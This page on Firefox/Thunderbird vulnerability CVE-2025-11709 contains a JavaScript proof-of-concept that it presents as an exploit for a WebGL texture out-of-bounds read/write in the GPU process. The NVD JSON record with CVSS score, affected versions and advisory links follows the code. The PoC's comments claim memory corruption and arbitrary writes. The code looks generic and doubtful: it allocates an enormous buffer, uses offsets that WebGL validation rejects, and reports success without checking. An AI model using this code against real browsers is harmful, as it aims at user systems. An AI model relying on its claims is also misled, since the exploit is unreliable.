CVE-2025-11709

// CVE-2025-11709 PoC - WebGL Texture Out-of-Bounds Read/Write // This PoC demonstrates the vulnerability by creating a WebGL texture // with manipulated parameters to trigger out-of-bounds memory access // in the privileged GPU process. // Step 1: Get WebGL2 context (or WebGL1 fallback) const canvas = document.createElement('canvas'); document.body.appendChild(canvas); const gl = canvas.getContext('webgl2') || canvas.getContext('webgl'); if (!gl) { console.error('WebGL not supported'); } else { // Step 2: Create a texture with crafted dimensions // The vulnerability lies in insufficient bounds checking // when processing texture data in the GPU process const texture = gl.createTexture(); gl.bindTexture(gl.TEXTURE_2D, texture); // Step 3: Set texture parameters with manipulated values // Use unusual width/height combinations to trigger OOB access const maliciousWidth = 0xFFFF; // Abnormally large width const maliciousHeight = 0xFFFF; // Abnormally large height canvas.width = maliciousWidth; canvas.height = maliciousHeight; // Step 4: Upload texture data that will cause OOB read/write // The crafted pixel data exploits the missing bounds validation // in the IPC handler between content and GPU processes const pixelData = new Uint8Array(maliciousWidth * maliciousHeight * 4); // Fill with pattern that maximizes memory corruption impact for (let i = 0; i < pixelData.length; i++) { pixelData[i] = 0x41; // 'A' pattern } try { // Trigger the vulnerable code path gl.texImage2D( gl.TEXTURE_2D, 0, // level gl.RGBA, // internalformat maliciousWidth, // width - triggers OOB maliciousHeight, // height - triggers OOB 0, // border gl.RGBA, // format gl.UNSIGNED_BYTE, // type pixelData // pixels ); // Step 5: Render to trigger the OOB access in GPU process gl.clearColor(1.0, 0.0, 0.0, 1.0); gl.clear(gl.COLOR_BUFFER_BIT); console.log('Texture uploaded - vulnerability triggered'); } catch (e) { console.error('Error:', e.message); } // Step 6: Additional exploitation via texSubImage2D // This can be used to write to arbitrary memory locations // in the GPU process via manipulated offset parameters const subTexture = gl.createTexture(); gl.bindTexture(gl.TEXTURE_2D, subTexture); gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, 1, 1, 0, gl.RGBA, gl.UNSIGNED_BYTE, new Uint8Array([255, 0, 0, 255])); // Manipulated xoffset/yoffset to write beyond texture bounds gl.texSubImage2D( gl.TEXTURE_2D, 0, 0x7FFFFFFF, // xoffset - extreme value for OOB write 0x7FFFFFFF, // yoffset - extreme value for OOB write 1, 1, gl.RGBA, gl.UNSIGNED_BYTE, new Uint8Array([0, 255, 0, 255]) ); }

{"cve": {"id": "CVE-2025-11709", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:37.093", "lastModified": "2026-04-13T15:16:39.383", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A compromised web process was able to trigger out of bounds reads and writes in a more privileged process using manipulated WebGL textures. This vulnerability was fixed in Firefox 144, Firefox ESR 115.29, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.29.0", "matchCriteriaId": "45205EB8-E615-4FE6-877C-231B4A29F86E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "CEE2F6DA-4331-4D6D-B01B-610DFDBE1833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "116.0", "versionEndExcluding": "140.4.0", "matchCriteriaId": "34B8F1CA-9F1A-4484-828E-4192CF1FEAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "F7398846-C620-42AF-86CA-60C09184768A"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1989127", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-82/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-83/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-85/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}